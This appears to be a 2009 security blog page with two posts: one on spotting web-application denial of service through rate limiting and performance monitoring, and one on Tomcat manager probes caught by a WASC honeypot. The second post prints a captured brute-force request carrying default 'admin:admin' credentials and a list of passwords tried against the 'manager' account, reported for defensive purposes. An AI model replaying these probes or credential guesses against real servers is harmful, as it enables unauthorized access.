Tuesday, October 6, 2009

Identifying Denial of Service Conditions Through Performance Monitoring

Submitted by Ryan Barnett 10/06/2009

Here is an interesting web application threat modeling exercise for you - how do you plan to identify and mitigate web application level denial of service conditions on your web sites?

This is one of those pesky security questions that, on the surface, seems pretty straight forward and then when you start peeling back the layers of complexity and interactions it becomes much more challenging. Here are some items to keep in mind.

Network DoS vs. Web App DoS

Whereas network level DoS attacks aim to flood your pipe with lower-level OSI traffic (SYN packets, etc...), web application layer DoS attacks can often be achieved with much less traffic. Just take a look at Rsnake's Slowloris app if you want to see a perfect example of the fragility of web server availability. The point here is that the amount of traffic which can often cause an HTTP DoS condition is often much less than what a network level device would identify as anomalous and therefore would not report on it as they would with traditional network level botnet DDoS attacks.

Rate Limiting

A common identification/mitigation implementation is to attempt Rate Limiting. This is essentially done by setting request threshold limits over a predefined period of time and monitoring request traffic for violations. While this is certainly useful for identify aggressive automated attacks, it has its own limitations.
  • What resources to protect?
While protecting a web application login page is straight forward, many web site owners have not properly identified which resources are both critical and susceptible to DoS conditions. There are many web apps that are extremely resource intensive and take a long time to complete - for example any reporting interface that needs to query a back-end database to generate large reports. These apps are perfect targets for a DoS attack as the overall number of requests needed to consume open http sockets and RAM is much lower than a request for a static resource.
  • What threshold to set?
Rate limiting is not a "one-size fits all" approach. It is highly dependent upon the resource itself. The threshold you would set against a login page to identify a brute force attack is much different then what you might set in order to identify a data scraping or DoS attack. The challenge for the defender is knowing ahead of time what to set. This is not easy as most users are missing a significant piece of the puzzle - correlating web application performance statistics. You may set an inbound rate limiting threshold for a resource that is either much too high and the application could fail due to the load (false negative), or you might set it much too low and start firing off alerts when in fact the application is able to handle the load quite fine (false positive).
Web Application Performance Monitoring

The best method for identifying fragile web resources and potential DoS thresholds is to actually monitor and track web application transaction processing times. Breach Security today announced that WebDefend 4.0 has a new Performance monitoring capability that aims to fill this important need.


With performance monitoring, the WAF user can track the average processing time including the combined average request time, web server processing time and response time. The following definitions apply in this pane:

• Request time is measured from the first packet to the last packet of the request.

• Web server processing time is measured from the last packet of the request to the first packet of the response.

• Response time is measured from the first packet to the last packet of the response.

With this information, it is easy to quickly identify the top URLs with high response latency and to pinpoint whether this is an application processing or networking issue. This data is a much truer picture of DoS conditions vs. rate limiting thresholds. The main advantages that this data brings to DoS threat modeling are identification of fragile resources that would be susceptible to attacks and to identify the an estimated threshold setting.

Monday, October 5, 2009

WASC Honeypots - Apache Tomcat Admin Interface Probes

Submitted by Ryan Barnett 10/05/2009

We have seen some probes similar to the following in our WASC Distributed Open Proxy Honeypots -
GET /manager/html HTTP/1.1
Referer: http://obscured:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0; MyIE 3.01)
Host: obscured:8080
Connection: Close
Cache-Control: no-cache
Authorization: Basic YWRtaW46YWRtaW4=
This appears to be a probe attempt to access the Apache Tomcat Admin interface. This is due to the combination of URI "/manager/html" and port 8080. It looks as though the client is submitting authentication data in the Authorization header. If you decode the base64 data, it shows the credentials as "admin:admin" which is the default username/password combination when Tomcat is installed.

WASC Honeypot participant Erwin Geirnaert has seen similar activity and provides more data here. The attackers are conducting brute force scans trying different passwords for the "manager" account -
manager:Test
manager:adminserver
manager:sqlserver
manager:2009
manager:159753
manager:1234qwerasdfzxcv

manager:1234qwerasdf

manager:1234qwer

manager:123qwe

manager:123qweasd
What do the attackers want to do once they gain access to the Tomcat server? Install backdoor/command WAR files so that they can execute code. Time to double check your default account passwords and implement those ACLs to only allow authorized clients to your Management interfaces...